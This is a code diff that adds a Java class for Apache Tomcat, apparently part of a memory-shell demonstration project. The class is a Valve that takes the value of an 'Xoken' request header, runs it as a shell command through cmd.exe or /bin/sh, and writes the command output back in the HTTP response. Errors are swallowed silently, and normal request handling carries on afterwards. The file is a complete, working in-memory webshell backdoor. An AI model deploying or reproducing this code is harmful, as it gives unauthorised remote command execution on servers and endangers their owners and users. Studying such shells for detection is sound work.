|
| 1 | +package com.demo.memshell.exec.valve; |
| 2 | + |
| 3 | + |
| 4 | +import org.apache.catalina.connector.Request; |
| 5 | +import org.apache.catalina.connector.Response; |
| 6 | +import org.apache.catalina.valves.ValveBase; |
| 7 | + |
| 8 | +import java.io.InputStream; |
| 9 | +import java.lang.reflect.Field; |
| 10 | +import java.lang.reflect.Method; |
| 11 | + |
| 12 | + |
| 13 | +/** |
| 14 | + * @author Whoopsunix |
| 15 | + */ |
| 16 | +public class TomcatValueExecMS extends ValveBase { |
| 17 | + |
| 18 | + private static String HEADER = "Xoken"; |
| 19 | + |
| 20 | + public void invoke(Request request, Response response) { |
| 21 | + try { |
| 22 | + String header = (String) invokeMethod(request, "getHeader", new Class[]{String.class}, new Object[]{HEADER}); |
| 23 | + String result = exec(header); |
| 24 | + invokeMethod(response, "setStatus", new Class[]{Integer.TYPE}, new Object[]{new Integer(200)}); |
| 25 | + Object writer = invokeMethod(response, "getWriter", new Class[]{}, new Object[]{}); |
| 26 | + invokeMethod(writer, "println", new Class[]{String.class}, new Object[]{result}); |
| 27 | + } catch (Exception e) { |
| 28 | + |
| 29 | + } |
| 30 | + |
| 31 | + try { |
| 32 | + this.getNext().invoke(request, response); |
| 33 | + } catch (Exception e) { |
| 34 | + |
| 35 | + } |
| 36 | + } |
| 37 | + |
| 38 | + public static String exec(String str) throws Exception { |
| 39 | + String[] cmd; |
| 40 | + if (System.getProperty("os.name").toLowerCase().contains("win")) { |
| 41 | + cmd = new String[]{"cmd.exe", "/c", str}; |
| 42 | + } else { |
| 43 | + cmd = new String[]{"/bin/sh", "-c", str}; |
| 44 | + } |
| 45 | + InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream(); |
| 46 | + return exec_result(inputStream); |
| 47 | + } |
| 48 | + |
| 49 | + public static String exec_result(InputStream inputStream) throws Exception { |
| 50 | + byte[] bytes = new byte[1024]; |
| 51 | + int len; |
| 52 | + StringBuilder stringBuilder = new StringBuilder(); |
| 53 | + while ((len = inputStream.read(bytes)) != -1) { |
| 54 | + stringBuilder.append(new String(bytes, 0, len)); |
| 55 | + } |
| 56 | + return stringBuilder.toString(); |
| 57 | + } |
| 58 | + |
| 59 | + public static Object getFieldValue(final Object obj, final String fieldName) throws Exception { |
| 60 | + final Field field = getField(obj.getClass(), fieldName); |
| 61 | + return field.get(obj); |
| 62 | + } |
| 63 | + |
| 64 | + public static Field getField(final Class<?> clazz, final String fieldName) { |
| 65 | + Field field = null; |
| 66 | + try { |
| 67 | + field = clazz.getDeclaredField(fieldName); |
| 68 | + field.setAccessible(true); |
| 69 | + } catch (NoSuchFieldException ex) { |
| 70 | + if (clazz.getSuperclass() != null) |
| 71 | + field = getField(clazz.getSuperclass(), fieldName); |
| 72 | + } |
| 73 | + return field; |
| 74 | + } |
| 75 | + |
| 76 | + public static Object invokeMethod(Object obj, String methodName, Class[] argsClass, Object[] args) throws Exception { |
| 77 | + Method method; |
| 78 | + try { |
| 79 | + method = obj.getClass().getDeclaredMethod(methodName, argsClass); |
| 80 | + } catch (NoSuchMethodException e) { |
| 81 | + method = obj.getClass().getSuperclass().getDeclaredMethod(methodName, argsClass); |
| 82 | + } |
| 83 | + method.setAccessible(true); |
| 84 | + return method.invoke(obj, args); |
| 85 | + } |
| 86 | +} |
0 commit comments